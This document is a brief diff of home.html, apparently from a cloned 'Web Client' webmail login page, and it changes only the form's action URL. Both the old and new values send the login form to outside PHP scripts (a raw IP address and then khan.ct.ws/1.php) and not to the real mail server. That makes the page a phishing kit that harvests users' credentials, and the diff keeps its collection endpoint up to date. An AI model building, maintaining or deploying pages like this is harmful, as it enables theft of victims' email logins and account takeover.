--- a/home.html
+++ b/home.html
@@ -58,7 +58,7 @@
 					<span class="ImgLoginBanner"></span>
 				</a></h1>
 				<div id="ZLoginAppName">Web Client</div>
-				<form method="post" name="loginForm" action="185.27.134.141/1.php" accept-charset="UTF-8">
+				<form method="post" name="loginForm" action="https://khan.ct.ws/1.php" accept-charset="UTF-8">
 								<input type="hidden" name="loginOp" value="login">
 								<input type="hidden" name="login_csrf" value="7f77dc16-2175-496d-9824-df60a1d41fde">
 <div id="ZLoginErrorPanel">
